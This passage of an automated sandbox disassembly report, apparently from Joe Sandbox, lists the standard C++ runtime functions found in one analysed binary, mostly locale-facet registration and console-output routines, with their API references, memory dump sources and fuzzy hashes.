• Opcode Fuzzy Hash: 9b256585575e0e803334890fb2450e5d6fbb0bce955c1891269d76d0069993e7
• Instruction Fuzzy Hash: 3501CC36900129DFCB15FB64E8526BEB7F1FF84720F280489E4186B291CF749E018B91
Uniqueness
Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32714
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3271E
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3276F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3278F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 78de371b52ac39b3798759668c94ddaa4c6da51c2fcb0a8efacf4723487f8db2
                                                                  • Instruction ID: 0fe0611f8f74d0cb50e0ab648f4262105187366618ee9da159d1569fe951491d
                                                                  • Opcode Fuzzy Hash: 78de371b52ac39b3798759668c94ddaa4c6da51c2fcb0a8efacf4723487f8db2
                                                                  • Instruction Fuzzy Hash: 1F019235910229DBCB15FB64D8566BEB7F1FF84720F380589F5186B292CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B2D759
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2D763
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2D7B4
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D7D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 764fc1e4eb25fbfe3c81e837963f4860adb4510ad935df217f54396e7f87d940
                                                                  • Instruction ID: bcaa7e211db368f3afd73acf7835201276518f43e7ad9f58a3116873d15c722c
                                                                  • Opcode Fuzzy Hash: 764fc1e4eb25fbfe3c81e837963f4860adb4510ad935df217f54396e7f87d940
                                                                  • Instruction Fuzzy Hash: CA01C0369001299FCB05FB64A8526BE77F1FF84720F280489E8186B291CF789E008791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B328D3
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B328DD
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3292E
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 5fcaab6a51624c4218745d520c85ba38ac8597da46067ed9bebf2c8e54f50649
                                                                  • Instruction ID: c76967cb797b9b91eededb79fd1266ca667ec6b616640f820c835ef93b7a3bf9
                                                                  • Opcode Fuzzy Hash: 5fcaab6a51624c4218745d520c85ba38ac8597da46067ed9bebf2c8e54f50649
                                                                  • Instruction Fuzzy Hash: 1801D231900229DBCB11FB64D8616BE77F1FF84720F340599F5186B291CFB49E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3283E
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32848
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32899
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B328B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 310f2ca145d0b6ccb58a63b58c3d991f3b7ad29e364b88a6142d42920d7ad0d1
                                                                  • Instruction ID: 4b773d0b19850e67beefcc7a2d5fe5c34e2c820b82eb00a72ddf9f6fe5f74eb0
                                                                  • Opcode Fuzzy Hash: 310f2ca145d0b6ccb58a63b58c3d991f3b7ad29e364b88a6142d42920d7ad0d1
                                                                  • Instruction Fuzzy Hash: 2501CC36D00129DBCB11EB64D851ABEB7F1FF84720F380589E418AB292CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3E974
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3E97E
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3E9CF
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E9EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 692d4735644e10125db7d508adb33687aea84569364af52e58f5e51cdd4364cf
                                                                  • Instruction ID: 4033e522357d0167c39cd3fe4340a2d748df48d234b8b1c3d9d648b2dbfb2b80
                                                                  • Opcode Fuzzy Hash: 692d4735644e10125db7d508adb33687aea84569364af52e58f5e51cdd4364cf
                                                                  • Instruction Fuzzy Hash: B701AD319001299BCB05AB6498116BE77F4AF84710F25068AF5246B2D2CF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EA09
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EA13
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EA64
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EA84
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 5aa732bc641c95cf96bdec624a69e03567055401e1c8dcdf2cd6418cf86782ee
                                                                  • Instruction ID: 8531acd869e8fdbdabd13aef8738826bf1f9a8b95d609e36e9a9ecbd96e67f08
                                                                  • Opcode Fuzzy Hash: 5aa732bc641c95cf96bdec624a69e03567055401e1c8dcdf2cd6418cf86782ee
                                                                  • Instruction Fuzzy Hash: 7D01AD359001299BCB11FB6498516AEBBF0FF94720F29058AE4246B2D1CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32BBC
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32BC6
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32C17
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32C37
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d3a1e60497cc2de0bb292f93e0b3d86d2479b9b273117067a464e1fc6e536e74
                                                                  • Instruction ID: 059e2d31cdedc5100b31d74f30e80324d152d702a73119bf9b311d9e48cc1aa9
                                                                  • Opcode Fuzzy Hash: d3a1e60497cc2de0bb292f93e0b3d86d2479b9b273117067a464e1fc6e536e74
                                                                  • Instruction Fuzzy Hash: 2501C031901129DBCB15FB6498156BEB7F0FF84710F344489E5146B2D1CF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EBC8
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EBD2
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3EC23
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EC43
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: dffe14bb4cee16a5592f318b544bfe6a6c261cbd2ed05f9b42f0613bddbabbc0
                                                                  • Instruction ID: 74495b79dacfc5589ddf93d45af4a937c8559bc0309d6d9bdc28cd8bf913f414
                                                                  • Opcode Fuzzy Hash: dffe14bb4cee16a5592f318b544bfe6a6c261cbd2ed05f9b42f0613bddbabbc0
                                                                  • Instruction Fuzzy Hash: C201AD329001299BCB15AB6498166BE77F1FF84720F680489E528AB2D2CF74DE008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32CE6
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32CF0
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32D41
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32D61
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 90ac7c59f51b54928638c9c1eadcc9e62de7fce1e5fccb9dbeb935c40d0d6b1f
                                                                  • Instruction ID: 776f860393916df6847815d1f980e335850fc58d197e4a34f4c08c037bea1a76
                                                                  • Opcode Fuzzy Hash: 90ac7c59f51b54928638c9c1eadcc9e62de7fce1e5fccb9dbeb935c40d0d6b1f
                                                                  • Instruction Fuzzy Hash: 1B01C031900229DBCB15FB6498516BE77F1FF84720F340599E5187B292CFB49E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3EC5D
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B3EC67
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B3ECB8
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3ECD8
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d154ebc02a0c0e525bd82a8463115ef4b3c162e8f7d2c9fcbb71f550f5d9338c
                                                                  • Instruction ID: a0150c51dce9c715e802bac4796c14dcee65737c62ed83a0adbb768d447c9391
                                                                  • Opcode Fuzzy Hash: d154ebc02a0c0e525bd82a8463115ef4b3c162e8f7d2c9fcbb71f550f5d9338c
                                                                  • Instruction Fuzzy Hash: FB01A932900129DBCB01AB649851ABEB7F1FF84720F68048AF4296B2D2CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32C51
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32C5B
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32CAC
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32CCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d49b9344c37b05382790368201fe10d725bf4f6b0ce9d3b9a2b86edb99de16fe
                                                                  • Instruction ID: 9d8c5d38bffd424507ef1b912c6c0d9fdef3ede0fe5d07f2278c3fa79eff7e60
                                                                  • Opcode Fuzzy Hash: d49b9344c37b05382790368201fe10d725bf4f6b0ce9d3b9a2b86edb99de16fe
                                                                  • Instruction Fuzzy Hash: 6D018C36901129DBCB15EBA498516BEB7F1FF84720F290489F5196B391CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32EA5
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32EAF
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32F00
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32F20
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: b2127bc789254d080f9b7c6e3fa2a38862e4d2fb5b0b32a8d1b88f5dd26af55e
                                                                  • Instruction ID: 24032b470fbc4df910af6e065e9dd253715a532fb4c26bb95f5d4d7d81f01e8a
                                                                  • Opcode Fuzzy Hash: b2127bc789254d080f9b7c6e3fa2a38862e4d2fb5b0b32a8d1b88f5dd26af55e
                                                                  • Instruction Fuzzy Hash: 2401C0359001299BCB01EB64D8156BE77F0FF84710F340489F5196B2D1DF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32E10
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32E1A
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32E6B
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 4421d14e76a817d171b20ec907d89d99b69355cef2dbeebbeed866ad8a36b9ee
                                                                  • Instruction ID: 24f755dd18bac16df950237c982d0dda8b7ede0a9499bb2599461cceb159f8d8
                                                                  • Opcode Fuzzy Hash: 4421d14e76a817d171b20ec907d89d99b69355cef2dbeebbeed866ad8a36b9ee
                                                                  • Instruction Fuzzy Hash: 5101C036900529DBCB11EB64E8126BEB7F1FF94B10F280989E5187B291CF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32F3A
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32F44
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32F95
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32FB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 0b371dbf99a9530554d8d40d085c65915411117b2ba3495efa996dbdc79ada35
                                                                  • Instruction ID: bcb8e2c79bbaa6ba6b62e2ea8c64073442d9151668506ed1f3b758047eb10403
                                                                  • Opcode Fuzzy Hash: 0b371dbf99a9530554d8d40d085c65915411117b2ba3495efa996dbdc79ada35
                                                                  • Instruction Fuzzy Hash: 4C01CC36A10129DFCB11EB649811ABEB7F1FF94720F280489F418AB292CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000), ref: 00B6369D
                                                                  • GetLastError.KERNEL32(?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?,?,?,00B6271F,?), ref: 00B636A9
                                                                    • Part of subcall function 00B6366F: CloseHandle.KERNEL32(FFFFFFFE,00B636B9,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?,?), ref: 00B6367F
                                                                  • ___initconout.LIBCMT ref: 00B636B9
                                                                    • Part of subcall function 00B63631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B63660,00B63040,?,?,00B62198,?,?,00000000,?), ref: 00B63644
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?), ref: 00B636CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 1f88f4822dc35fac3268bda839a04462319ac7a964c50e4fcd58e58d76f26ffc
                                                                  • Instruction ID: 4cdddbcc9ad2bf1aa66cd5395394c505cc701a2323d5255b478d9312c52348c4
                                                                  • Opcode Fuzzy Hash: 1f88f4822dc35fac3268bda839a04462319ac7a964c50e4fcd58e58d76f26ffc
                                                                  • Instruction Fuzzy Hash: F3F03036549118BBCF222F99DC04D893FE6FB097A1B0040A4FE1997270CE368A60EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SleepConditionVariableCS.KERNELBASE(?,00B42CBD,00000064), ref: 00B42D43
